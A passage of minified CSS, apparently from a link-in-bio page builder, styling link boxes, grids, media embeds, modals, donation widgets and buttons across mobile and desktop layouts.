0!important}.ts-dongletitle{font-size:37px!important}.ts-price{font-size:38px!important}.ts-midhuge{font-size:45px!important}.ts-huge{font-size:60px!important}.ts-hugexx{font-size:80px!important}.ts-hugex2{font-size:120px!important}.ts-hugex4{font-size:240px!important}.ts-humongous{font-size:72px!important}.ts-dongle-title{font-size:28px!important}.ts-dongleheadline{font-size:40px!important;line-height:32px}.lh_25{line-height:25px}.lh_30{line-height:30px}.lh_35{line-height:35px}.btn{text-transform:uppercase;padding:.25rem .5rem}.btn.btn-big{font-size:20px!important}.btn.btn-big i{position:relative;top:-1px}.btn.btn-primary{font-size:14px}.card-body{padding:1rem}.i-link-action{font-size:20px}.card-title{text-align:center}.py-4_5{padding-bottom:24px!important;padding-top:24px!important}#navbar-top a.nav-link i{margin-right:29px!important}body{padding-top:70px;font-size:14px;background-color:var(--grey250)}#navbar-top{padding-top:5px;padding-bottom:5px;padding-left:0;padding-right:0}#navbar-top .navbar-collapse a.nav-link i{width:14px;text-align:center}.nav-tabs,.nav-tabs .nav-link{border:0;color:black}#navbar-top-2{margin-top:41px}#navbar-top-2 span{display:inline!important}.custom-link-padding{padding-top:6px;padding-bottom:6px}#navbar-bottom-mobile .border-phone.rounded{border-radius:29px!important;border:0!important;padding-top:6px!important;box-shadow:rgba(0,0,0,.1) 0 0 8px 0}.phone-screenshot{border-radius:29px!important;box-shadow:rgba(0,0,0,.1) 0 0 8px 0;border-width:4px!important}#navbar-bottom-mobile,#navbar-bottom-mobile-button{padding-top:0;padding-bottom:0;height:90px}#navbar-bottom-mobile span,#navbar-bottom-mobile-button span{position:relative;top:-4px;font-weight:normal;font-size:11px}#navbar-bottom-mobile i,#navbar-bottom-mobile-button i{font-size:20px}.profile-picture{border-radius:50%;height:75px;width:75px;object-fit:cover}.radio-vertical.custom-control{margin:0;padding:0}.radio-vertical .custom-control-label::before{position:absolute;left:50%;margin-left:-6px;width:12px!important;height:12px!important}.radio-vertical .custom-control-label::after{position:absolute;left:50%;margin-left:-6px;width:12px!important;height:12px!important}.password-visibility .input-group-addon{position:absolute;right:9px;top:13px}.switch{position:relative;display:inline-block;width:50px;height:28.2px}.switch input{opacity:0;width:0;height:0}.switch-label{position:relative;top:3px}.switch-positioned{top:-4px;margin-bottom:0!important}.slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#ccc;-webkit-transition:.4s;transition:.4s}.slider:before{position:absolute;content:"";height:22.3px;width:22.3px;left:2.6px;bottom:2.6px;background-color:white;-webkit-transition:.4s;transition:.4s}input:checked+.slider:before{-webkit-transform:translateX(22.3px);-ms-transform:translateX(22.3px);transform:translateX(22.3px)}.slider.round{border-radius:22.6px}.slider.round:before{border-radius:50%}#edit_picture{position:absolute;top:12px;right:-22px;padding-top:0;width:40px;height:22px;border-radius:15px!important;margin:0}.c-pointer{cursor:pointer}.c-drag{cursor:ns-resize}.c-normal{cursor:default!important}input.text-white::placeholder{color:#AAA}.el-url{display:block;width:100%;white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.nav-tabs a{text-transform:uppercase;padding-left:7px;padding-right:7px}.vl{width:1px;height:100%;position:absolute;left:50%;margin-left:-.5px;background-color:#CCC}#lnk-copy-source{display:none;position:absolute;top:0;left:0;opacity:0}footer.position-absolute{bottom:0}.pb-linkimage{height:100px;width:100%;object-fit:cover}.pb-linklink{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.w-110{width:110px}.pl-getbutton{bottom:30px;right:20px;border-radius:30px;z-index:1}.create-page-button i{position:absolute}.phone_action{position:absolute;left:0;width:100%;text-align:center;transform:translateY(-50%);z-index:3}.create-page-button{text-align:center;position:relative}.pb-footer .logo-text,.admin-layout-container .logo-text{font-size:20px!important;display:inline-block;position:relative;top:2px;font-family:Calistoga,cursive!important}.pb-profilepic{width:90px;height:90px;object-fit:cover}.pb-profilepic.profilepic_large{height:110px;width:110px}.pb-profilepic.profilepic_largest{height:150px;width:150px}.pb-profilepic.profilepic_small{height:70px;width:70px}.btn.no-uppercase,a.no-uppercase,span.no-uppercase,.no-uppercase,a.no-uppercase{text-transform:none!important}.fix-top-spacing-1{position:relative;top:5px}.fix-top-spacing-2{position:relative;bottom:3px}.pb-links .pb-linkbox{padding:2px}.op-80{opacity:.80}.op-70{opacity:.65}.op-40{opacity:.40}.navbar-toggler:focus,.navbar-toggler:active,.navbar-toggler-icon:focus{outline:0;box-shadow:none}.navbar-toggler-icon{background-image:url("data:image/svg+xml;charset=utf8,%3Csvg viewBox='0 0 32 32' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath stroke='rgba(0,0,0,1)' stroke-width='2' stroke-linecap=round stroke-miterlimit='10' d='M4 8h24M4 16h24M4 24h24'/%3E%3C/svg%3E")!important}.navbar-toggler{border-color:rgb(0,0,0)!important}a:hover{text-decoration:none}.alert.alert-info{background-color:#cde2f5;border:0}@media screen and (max-width:768px){#navbar-bottom-mobile-button{position:fixed;bottom:0;width:100%;left:0}}.pb-placeholder-mobile,.pb-placeholder-desktop{display:none;position:relative}.pb-placeholder-mobile i,.pb-placeholder-desktop i{color:white;font-size:50px;position:absolute;top:50%;left:50%;margin-top:-25px;margin-left:-25px;color:#CCC}.pb-linkimage{position:relative}.pb-linkimage img{width:100%;height:100%;position:absolute;top:0;left:0;object-fit:cover}.pb-linkimage iframe{height:100%;position:absolute;top:0;left:0;width:100%}.pb-embed.pb-embed-EMBED_APPLE{height:150px!important}.pb-embed.pb-embed-EMBED_SOUNDCLICK{height:150px!important}.pb-embed.pb-embed-EMBED_AMAZON{height:200px!important}.pb-embed-EMBED_SPOTIFY-podcast,.pb-embed-EMBED_SPOTIFY-podcast-episode{height:160px!important}.pb-embed.pb-embed-EMBED_RCAST{height:428px!important}.pb-mobile-list-small-sqr .pb-embed-EMBED_AUDIOCOM,.pb-mobile-list-small-rnd .pb-embed-EMBED_AUDIOCOM{height:204px!important}.pb-shadow-link{box-shadow:#3D4043 8px 8px 0 0}.pb-linktitle{word-wrap:break-word}.pb-link-price{display:block}@media (min-width:768px){.pb-desktop-hide{display:none!important}.pb-desktop-list-small-sqr{width:100%}.pb-desktop-list-small-sqr .pb-linkbox-inner{min-height:64px;position:relative}.pb-desktop-list-small-sqr .pb-linkbox-inner span.w-100{width:auto!important}.pb-desktop-list-small-sqr .pb-linkimage:not(.pb-embed){width:50px;height:50px;position:absolute;left:7px;top:50%;margin-top:-25px}.pb-desktop-list-small-sqr .pb-embed{height:80px}.pb-desktop-list-small-sqr .pb-linktitle{padding-left:64px;padding-right:64px}.pb-desktop-list-small-rnd{width:100%}.pb-desktop-list-small-rnd .pb-linkbox-inner{min-height:64px;border-radius:31px!important;position:relative}.pb-desktop-list-small-rnd .pb-linkbox-inner span.w-100{width:auto!important}.pb-desktop-list-small-rnd .pb-linkimage:not(.pb-embed){width:50px;height:50px;position:absolute;left:7px;border-radius:50%!important;top:50%;margin-top:-25px}.pb-desktop-list-small-rnd .pb-embed{height:80px}.pb-desktop-list-small-rnd .pb-linkimage img{border-radius:50%!important}.pb-desktop-list-small-rnd .pb-linktitle{padding-left:64px;padding-right:64px}.pb-desktop-list-large-sqr{width:100%}.pb-desktop-list-large-sqr .pb-linkbox-inner{padding:0 0 10px 0!important}.pb-desktop-list-large-sqr .pb-linkimage{width:100%;height:0;padding-top:100%;background-size:100%}.pb-desktop-list-large-sqr .pb-linktitle{margin-top:10px!important;display:block}.pb-desktop-list-large-rec{width:100%}.pb-desktop-list-large-rec .pb-linkbox-inner{padding:0 0 10px 0!important}.pb-desktop-list-large-rec .pb-linkimage{width:100%;height:0;padding-top:56.25%;background-size:100%}.pb-desktop-list-large-rec .pb-linktitle{margin-top:10px!important;display:block}.pb-desktop-grid-sqr-notit{width:100%}.pb-desktop-grid-sqr-notit .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-sqr-notit .pb-linkimage,.pb-desktop-grid-sqr-notit div.pb-placeholder-desktop{width:100%;height:0;padding-top:100%;background-size:100%}.pb-desktop-grid-sqr-notit div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-sqr-notit .pb-linktitle{display:none!important}.pb-links .pb-linkbox.pb-desktop-grid-vertical-notitle{padding-left:5px!important;padding-right:5px!important}.pb-desktop-grid-vertical-notitle{width:100%}.pb-desktop-grid-vertical-notitle .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-vertical-notitle .pb-linkimage,.pb-desktop-grid-vertical-notitle div.pb-placeholder-desktop{width:100%;height:0;padding-top:177%;background-size:100%}.pb-desktop-grid-vertical-notitle div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-vertical-notitle .pb-linktitle{display:none!important}.pb-links .pb-linkbox.pb-desktop-grid-instagram-nomargs,.pb-links .pb-linkbox.pb-desktop-grid-instagram{padding-left:5px!important;padding-right:5px!important}.pb-desktop-grid-instagram-nomargs,.pb-desktop-grid-instagram{width:100%}.pb-desktop-grid-instagram-nomargs .pb-linkbox-inner,.pb-desktop-grid-instagram .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-instagram-nomargs .pb-linkimage,.pb-desktop-grid-instagram-nomargs div.pb-placeholder-desktop,.pb-desktop-grid-instagram .pb-linkimage,.pb-desktop-grid-instagram div.pb-placeholder-desktop{width:100%;height:0;padding-top:100%;background-size:100%}.pb-desktop-grid-instagram-nomargs div.pb-placeholder-desktop,.pb-desktop-grid-instagram div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-instagram-nomargs .pb-linktitle,.pb-desktop-grid-instagram .pb-linktitle{display:none!important}.pb-links .pb-linkbox.pb-desktop-grid-instagram-nomargs{padding-left:5px!important;padding-right:5px!important}.pb-desktop-grid-instagram-nomargs{width:100%}.pb-desktop-grid-instagram-nomargs .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-instagram-nomargs .pb-linkimage,.pb-desktop-grid-instagram-nomargs div.pb-placeholder-desktop{width:100%;height:0;padding-top:100%;background-size:100%}.pb-desktop-grid-instagram-nomargs div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-instagram-nomargs .pb-linktitle{display:none!important}.pb-desktop-grid-rec-notit{width:100%}.pb-desktop-grid-rec-notit .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-rec-notit .pb-linkimage,.pb-desktop-grid-rec-notit div.pb-placeholder-desktop{width:100%;height:0;padding-top:56.25%;background-size:100%}.pb-desktop-grid-rec-notit div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-rec-notit .pb-linktitle{display:none!important}.pb-desktop-grid-vertical-title{width:100%}.pb-desktop-grid-vertical-title .pb-linkbox-inner{padding:0!important;background-color:none!important;display:flex!important;height:100%}.pb-desktop-grid-vertical-title .pb-linkimage,.pb-desktop-grid-vertical-title div.pb-placeholder-desktop{width:100%;height:0;padding-top:177%;background-size:100%}.pb-desktop-grid-vertical-title .pb-linkbox-inner .d-block.w-100.h-100{height:auto!important}.pb-desktop-grid-vertical-title div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-vertical-title .pb-linkbox-inner .d-block.w-100.h-100{height:auto!important}.pb-desktop-grid-vertical-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important;flex:1}.pb-desktop-grid-sqr-title{width:100%}.pb-desktop-grid-sqr-title .pb-linkbox-inner{padding:0!important;background-color:none!important;display:flex!important;height:100%}.pb-desktop-grid-sqr-title .pb-linkimage,.pb-desktop-grid-sqr-title div.pb-placeholder-desktop{width:100%;height:0;padding-top:100%;background-size:100%}.pb-mobile-grid-sqr-title .pb-linkbox-inner .d-block.w-100.h-100{height:auto!important}.pb-desktop-grid-sqr-title div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-sqr-title .pb-linkbox-inner .d-block.w-100.h-100{height:auto!important}.pb-desktop-grid-sqr-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important;flex:1}.pb-desktop-grid-rec-title{width:100%}.pb-desktop-grid-rec-title .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-rec-title .pb-linkimage,.pb-desktop-grid-rec-title div.pb-placeholder-desktop{width:100%;height:0;padding-top:56.25%;background-size:100%}.pb-desktop-grid-rec-title div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-rec-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-desktop-grid-old-title{width:100%}.pb-desktop-grid-old-title .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-desktop-grid-old-title .pb-linkimage,.pb-desktop-grid-old-title div.pb-placeholder-desktop{width:100%;height:0;padding-top:73.52%;background-size:100%}.pb-desktop-grid-old-title div.pb-placeholder-desktop{display:block!important}.pb-desktop-grid-old-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-desktop-list-large-old{width:100%}.pb-desktop-list-large-old .pb-linkbox-inner{padding:0 0 10px 0!important}.pb-desktop-list-large-old .pb-linkimage{width:100%;height:0;padding-top:73.52%;background-size:100%}.pb-desktop-list-large-old .pb-linktitle{margin-top:10px!important;display:block}.pb-desktop-list-small-rnd .pb-embed.pb-embed-EMBED_SOUNDEE,.pb-desktop-list-small-sqr .pb-embed.pb-embed-EMBED_SOUNDEE{height:164px!important}}.page-separator{height:1px}.preview-pic{width:30px;height:30px;position:relative;top:2px}@media (max-width:768px){.pb-mobile-hide{display:none!important}.pb-mobile-list-small-sqr{width:100%}.pb-mobile-list-small-sqr .pb-linkbox-inner{min-height:64px}.pb-mobile-list-small-sqr .pb-linkbox-inner span.w-100{width:auto!important}.pb-mobile-list-small-sqr .pb-linkimage:not(.pb-embed){width:50px;height:50px;position:absolute;left:9px;top:50%;margin-top:-25px}.pb-mobile-list-small-sqr .pb-embed{height:80px}.pb-mobile-list-small-sqr .pb-linktitle{padding-left:66px;padding-right:64px}.pb-links-noimg .pb-mobile-list-small-sqr .pb-linktitle{padding-left:10px;padding-right:10px}.pb-mobile-list-small-rnd{width:100%}.pb-mobile-list-small-rnd .pb-linkbox-inner{min-height:64px;border-radius:31px!important}.pb-mobile-list-small-rnd .pb-linkbox-inner span.w-100{width:auto!important}.pb-mobile-list-small-rnd .pb-linkimage:not(.pb-embed){width:50px;height:50px;position:absolute;left:9px;border-radius:50%!important;margin-bottom:0!important;top:50%;margin-top:-25px}.pb-mobile-list-small-rnd .pb-embed{height:80px}.pb-mobile-list-small-rnd .pb-linkimage img{border-radius:50%!important}.pb-mobile-list-small-rnd .pb-linktitle{padding-left:64px;padding-right:64px}.pb-links-noimg .pb-mobile-list-small-rnd .pb-linktitle{padding-left:20px;padding-right:20px}.pb-mobile-list-large-sqr{width:100%}.pb-mobile-list-large-sqr .pb-linkbox-inner{padding:0!important;position:relative}.pb-mobile-list-large-sqr .pb-linkimage{width:100%;height:0;padding-top:100%;background-size:100%}.pb-mobile-list-large-sqr .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-mobile-list-large-rec{padding:0!important;position:relative;width:100%}.pb-mobile-list-large-rec .pb-linkbox-inner{padding:0!important}.pb-mobile-list-large-rec .pb-linkimage{width:100%;height:0;padding-top:56.25%;background-size:100%}.pb-mobile-list-large-rec .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-links .pb-linkbox.pb-mobile-grid-vertical-notitle{padding:1.5px!important;margin-bottom:0!important}.pb-links.effect-progress .pb-linkbox.pb-mobile-grid-vertical-notitle{margin-bottom:20px!important}.pb-links.effect-shadow .pb-linkbox.pb-mobile-grid-vertical-notitle{margin-bottom:12px!important}.pb-links.effect-striped .pb-linkbox.pb-mobile-grid-vertical-notitle{margin-bottom:12px!important}.pb-links.effect-box .pb-linkbox.pb-mobile-grid-vertical-notitle{margin-bottom:12px!important}.pb-mobile-grid-vertical-notitle{width:100%}.pb-mobile-grid-vertical-notitle .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-vertical-notitle .pb-linkimage,.pb-mobile-grid-vertical-notitle div.pb-placeholder-mobile{width:100%;height:0;padding-top:177%;background-size:100%}.pb-mobile-grid-vertical-notitle div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-vertical-notitle .pb-linktitle{display:none!important}.pb-mobile-grid-sqr-notit{width:100%}.pb-mobile-grid-sqr-notit .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-sqr-notit .pb-linkimage,.pb-mobile-grid-sqr-notit div.pb-placeholder-mobile{width:100%;height:0;padding-top:100%;background-size:100%}.pb-mobile-grid-sqr-notit div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-sqr-notit .pb-linktitle{display:none!important}.pb-links .pb-linkbox.pb-mobile-grid-instagram{padding:1.5px!important;margin-bottom:0!important}.pb-links.effect-progress .pb-linkbox.pb-mobile-grid-instagram{margin-bottom:20px!important}.pb-links.effect-shadow .pb-linkbox.pb-mobile-grid-instagram{margin-bottom:12px!important}.pb-links.effect-striped .pb-linkbox.pb-mobile-grid-instagram{margin-bottom:12px!important}.pb-links.effect-box .pb-linkbox.pb-mobile-grid-instagram{margin-bottom:12px!important}.pb-mobile-grid-instagram{width:100%}.pb-mobile-grid-instagram .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-instagram .pb-linkimage,.pb-mobile-grid-instagram div.pb-placeholder-mobile{width:100%;height:0;padding-top:100%;background-size:100%}.pb-mobile-grid-instagram div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-instagram .pb-linktitle{display:none!important}.pb-links .pb-linkbox.pb-mobile-grid-instagram-nomargs{padding:1.5px!important;margin-bottom:0!important}.pb-links.effect-progress .pb-linkbox.pb-mobile-grid-instagram-nomargs{margin-bottom:20px!important}.pb-links.effect-shadow .pb-linkbox.pb-mobile-grid-instagram-nomargs{margin-bottom:12px!important}.pb-links.effect-striped .pb-linkbox.pb-mobile-grid-instagram-nomargs{margin-bottom:12px!important}.pb-links.effect-box .pb-linkbox.pb-mobile-grid-instagram-nomargs{margin-bottom:12px!important}.pb-mobile-grid-instagram-nomargs{width:100%}.pb-mobile-grid-instagram-nomargs .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-instagram-nomargs .pb-linkimage,.pb-mobile-grid-instagram-nomargs div.pb-placeholder-mobile{width:100%;height:0;padding-top:100%;background-size:100%}.pb-mobile-grid-instagram-nomargs div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-instagram-nomargs .pb-linktitle{display:none!important}.pb-mobile-grid-rec-notit{width:100%}.pb-mobile-grid-rec-notit .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-rec-notit .pb-linkimage,.pb-mobile-grid-rec-notit div.pb-placeholder-mobile{width:100%;height:0;padding-top:56.25%;background-size:100%}.pb-mobile-grid-rec-notit div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-rec-notit .pb-linktitle{display:none!important}.pb-mobile-grid-vertical-title{width:100%}.pb-mobile-grid-vertical-title .pb-link-price{display:block}.pb-mobile-grid-vertical-title .pb-linkbox-inner{padding:0!important;background-color:none!important;display:flex!important;height:100%}.pb-mobile-grid-vertical-title .pb-linkbox-inner .d-block.w-100.h-100{height:auto!important}.pb-mobile-grid-vertical-title .pb-linkimage,.pb-mobile-grid-vertical-title div.pb-placeholder-mobile{width:100%;height:0;padding-top:177%;background-size:100%}.pb-mobile-grid-vertical-title div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-vertical-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important;flex:1}.pb-mobile-grid-sqr-title{width:100%}.pb-mobile-grid-sqr-title .pb-link-price{display:block}.pb-mobile-grid-sqr-title .pb-linkbox-inner{padding:0!important;background-color:none!important;display:flex!important;height:100%}.pb-mobile-grid-sqr-title .pb-linkbox-inner .d-block.w-100.h-100{height:auto!important}.pb-mobile-grid-sqr-title .pb-linkimage,.pb-mobile-grid-sqr-title div.pb-placeholder-mobile{width:100%;height:0;padding-top:100%;background-size:100%}.pb-mobile-grid-sqr-title div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-sqr-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important;flex:1}.pb-mobile-grid-rec-title{width:100%}.pb-mobile-grid-rec-title .pb-link-price{display:block}.pb-mobile-grid-rec-title .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-rec-title .pb-linkimage,.pb-mobile-grid-rec-title div.pb-placeholder-mobile{width:100%;height:0;padding-top:56.25%;background-size:100%}.pb-mobile-grid-rec-title div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-rec-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-mobile-grid-old-title{width:100%}.pb-mobile-grid-old-title .pb-link-price{display:block}.pb-mobile-grid-old-title .pb-linkbox-inner{padding:0!important;background-color:none!important}.pb-mobile-grid-old-title .pb-linkimage,.pb-mobile-grid-old-title div.pb-placeholder-mobile{width:100%;height:0;padding-top:73.52%;background-size:100%}.pb-mobile-grid-old-title div.pb-placeholder-mobile{display:block!important}.pb-mobile-grid-old-title .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-mobile-list-large-old{padding:0!important;position:relative;width:100%}.pb-mobile-list-large-old .pb-link-price{display:block}.pb-mobile-list-large-old .pb-linkbox-inner{padding:0!important}.pb-mobile-list-large-old .pb-linkimage{width:100%;height:0;padding-top:73.52%;background-size:100%}.pb-mobile-list-large-old .pb-linktitle{display:block!important;padding-top:10px!important;padding-bottom:10px!important}.pb-mobile-grid-rec-notit .pb-embed.pb-embed-EMBED_APPLE{height:100px!important}.pb-mobile-grid-rec-notit .pb-embed.pb-embed-EMBED_APPLE iframe{min-height:100px!important}.pb-mobile-grid-rec-title .pb-embed.pb-embed-EMBED_APPLE{height:100px!important}.pb-mobile-grid-rec-title .pb-embed.pb-embed-EMBED_APPLE iframe{min-height:100px!important}.pb-mobile-grid-old-title .pb-embed.pb-embed-EMBED_APPLE{height:138px!important}.pb-mobile-grid-old-title .pb-embed.pb-embed-EMBED_APPLE iframe{min-height:138px!important}.pb-mobile-list-small-rnd .pb-embed.pb-embed-EMBED_SOUNDEE,.pb-mobile-list-small-sqr .pb-embed.pb-embed-EMBED_SOUNDEE{height:164px!important}}.pagination-button{border:0!important}.mn-2{position:relative;top:-6px}.embed-select,.embed-select:focus{background:transparent;color:white;border:0;box-shadow:none;margin-left:-14px;font-size:16px}.cc-card{height:25px}.synced-bg{opacity:.3}.synced-ok{top:0;left:0}.nl-spinner{top:3px}.lfa{line-height:1}.break-td{word-break:break-all}.break-title{word-break:break-all}.slick-dots{top:-35px;bottom:auto;color:white;height:30px}.slick-prev,.slick-next{position:fixed!important;top:50%;transform:translateY(-50%);right:12px!important;z-index:1039!important;background-color:white!important;height:32px!important;width:32px!important;border-radius:50%!important;color:black!important}.slick-prev i{position:relative;right:1px}.slick-next i{position:relative;left:1px}.slick-prev:before,.slick-next:before{font-size:27px!important;content:'';display:none!important}.slick-arrow .fas:before,.slick-arrow .fas:after{font-size:18px}.slick-dots li:first-child{margin-left:11px!important}.slick-prev{left:12px!important}.noselect,.noselect:focus{outline:0}.PG_upload_preview,.fw-image{max-width:100%}.PG_upload_preview{max-height:150px}.carousel-indicators{bottom:auto;top:36px}.slick-dots li{margin:0!important}.slick-slide button img{display:inherit}.pb-donate-form{display:none}.pb-supportme div.pb-linkimage{top:7px;margin-top:0}div.pb-close{display:none;position:absolute;right:7px;top:19px;z-index:99}.pb-supportme span.pb-linktitle{margin-top:0!important}.btn-paypal,.btn-outline-paypal{border-radius:25px;border:1px solid white}.btn-outline-paypal{color:#009cde;border-color:#009cde;background:white}#pb-d-paypal{border-radius:25px}.nomargin-icons div.col{margin-top:0!important}.btn-pagnotta{padding:.5rem 1rem;text-align:center;border-radius:26.5px;text-transform:none}.btn-pagnotta.pos-top-3{position:relative;top:-5px}.btn-pagnotta.pos-top-10{position:relative;top:-8px}div.modal .modal-footer{border:0!important}@media only screen and (max-width:768px){div.modal-dialog{position:absolute;bottom:0;margin:0;width:100%}div.modal-content{border-top-left-radius:32px;border-top-right-radius:32px;border-bottom-left-radius:0;border-bottom-right-radius:0}div.modal.fade{animation:slideup .4s}div.modal.faded{animation:slidedown .4s}div.modal .modal-header{position:relative;border:0!important}div.modal .btn-close{position:absolute;right:29px;margin:0!important;top:32px;padding:0!important}div.modal .modal-header .modal-title{text-align:center;margin-left:auto;margin-right:auto;}div.modal .modal-header .fa-times:before{content:"\f13a"}}.slick-dots li,.slick-dots li button{width:35px!important;text-align:center}.slick-dots li button:before{font-family:"Font Awesome 5 Pro"!important;content:"\f86c"!important;font-size:20px!important}@media (max-width:576px){.modal-fullscreen .modal-dialog,.modal-fullscreen .modal-content,.modal-fullscreen form{height:100%}.modal-fullscreen form:not([name=public-search-form]){display:block}.modal-fullscreen .modal-content{overflow-y:hidden}.modal-fullscreen .modal-header{position:fixed;width:100%;z-index:2;background-color:white}.modal-fullscreen .modal-body{position:relative;z-index:1;overflow-y:scroll;overflow-x:hidden;height:calc(100% - 80px)!important}#PG_BlockEditModal.modal-fullscreen .modal-body,#LY_addBlockModal.modal-fullscreen .modal-body{height:calc(100% - 88px - 74px)!important}}.modal .nav-tabs a.nav-link{text-transform:none!important}@keyframes slideup{from{bottom:-300px;height:0;opacity:1}to{height:auto;bottom:0;opacity:1}}@keyframes slidedown{from{bottom:0;height:auto;opacity:1}to{height:0;bottom:-300px;opacity:1}}.form-file-fix{height:39px}.text-underline{text-decoration:underline}#donate_icon_save{position:relative;top:4px}.icon-donationbox i{width:40px;height:44px!important;display:block;padding-top:10px;padding-bottom:10px;border-bottom:0;border-top-left-radius:10px;border-top-right-radius:10px}#donate_info_container{padding:10px;position:relative;top:-23px;border-bottom-left-radius:10px;border-bottom-right-radius:10px}.icons .icon-donationbox:first-child{padding-left:0!important}.icons .icon-donationbox:last-child{padding-right:2px!important}@media (max-width:576px){.icons .icon-donationbox:last-child{padding-right:15px!important;position:relative;left:2px}.slick-prev,.slick-next{display:none!important}#PUB_LnkCarouselModal .slick-prev,#PUB_LnkCarouselModal .slick-next{display:block!important;position:absolute!important;top:40px}}.icon-donationbox i.active{z-index:2;position:relative}::placeholder{color:#CCC!important}:-ms-input-placeholder{color:#CCC!important}::-ms-input-placeholder{color:#CCC!important}.br-spacer{content:" ";height:8px}.el-editext{top:5px}.group-item .el-editext{top:0}#msg_close_style{top:150px;right:10px;width:250px}.example-plus{width:20px;height:20px;border-radius:50%;font-size:12px!important;position:relative;top:-5px}.example-plus:before{position:relative;top:4px;left:-2px}#msg_close_style{z-index:11}.pb-helper{position:absolute}.pb-helper::before,.pb-helper::after{display:none!important}@media (max-width:768px){.stats-page table.table td{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;max-width:167px}.newsletter_container td,.contactform_container td{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;max-width:167px}}.btn-cause.unchecked{filter:grayscale(0.80)}.btn-cause{border-radius:0!important;position:relative;z-index:1;background:white;border:3px solid #101832;color:black;height:77px;display:flex;align-items:center;text-align:center;justify-content:center}.btn-cause::before,.btn-cause::after{content:'';display:block;position:absolute;z-index:-1;background:#101832;border:3px solid #101832}.btn-cause::before{left:-14px;top:4px;width:12px;height:calc(100% + 4px);transform:skewY(-45deg)}.btn-cause::after{width:calc(100% + 4px);height:12px;transform:skewX(-45deg);right:4px;bottom:-14px}.inject-admin span{border-top-left-radius:29px;border-bottom-left-radius:0}.blockseparator{border:2px solid black;border-bottom:0;border-left:0;border-right:0}.border-dashed{border-style:dashed;border-top:0;border-right:0;border-left:0;border-width:2px}.border-dotted{border-style:dotted;border-top:0;border-right:0;border-left:0;border-width:2px}.border-double{border-style:double;border-top:0;border-right:0;border-left:0;border-width:6px}.separator-tickest{border-width:8px}.separator-ticker{border-width:5px}.border-double.separator-ticker{border-width:10px}.border-double.separator-tickest{border-width:14px}@media (min-width:992px){.tab-mixed{display:block!important}}.rounded-more{border-radius:10px!important}.rounded-medium{border-radius:6px!important}.price-to-align-top{position:relative;top:6px}.font-roboto{font-family:Roboto,sans-serif!important}.font-pacifico{font-family:Pacifico,cursive!important}.font-dongle{font-family:Dongle,cursive!important}.font-titan{font-family:'Titan One',cursive!important}.blockspacer_base{width:100%}.blockspacer{height:65px;width:100%}.blockspacer_small{height:35px}.blockspacer_smallest{height:20px}.blockspacer_large{height:90px}.BLK_SpacerSize_icon{height:30px;position:relative}.BLK_SpacerSize_icon i{position:absolute;bottom:0;left:50%;transform:translateX(-50%)}.btn-fix-top{position:relative;top:1px}.btn-fix-height{height:32px;position:relative;top:1px}.opacity-6{opacity:.6}.agency-login-avatar{width:30px;height:30px}.w-88px{width:88px}.font-size-sample{width:64px;height:64px;border:3px solid transparent}.public-modals .close{background-color:transparent;border:0}.public-modals .modal.fade .modal-dialog{transform:none}.public-modals h5.modal-title{font-size:17.5px!important}#PB_SignupModal .login-button.google-signup-btn img{top:9px}#PB_SignupModal .login-button.apple-login-btn .fa-apple{top:8px}.public-modals h5{font-weight:bold!important}#icon-copy-text{top:0;left:0;height:1px;opacity:0}.rectangle_916,.rectangle_169{position:relative}.rectangle_916::after,.rectangle_169::after{content:"";display:block}.rectangle_916::after{padding-bottom:177.78%}.rectangle_169::after{padding-bottom:56.25%}.sl-overlay{opacity:.95!important}.btn-loading,.btn-loadingfix,form.form-loading button[type=submit]{position:relative}.btn-loading span.spinner-grow,.btn-loadingfix span.spinner-grow,form.form-loading button[type=submit] span.spinner-grow{position:absolute;right:10px;top:11px}.btn-loading.btn-newsletter span.spinner-grow{top:21px}form.form-loading button.btn-pagnottona[type=submit] 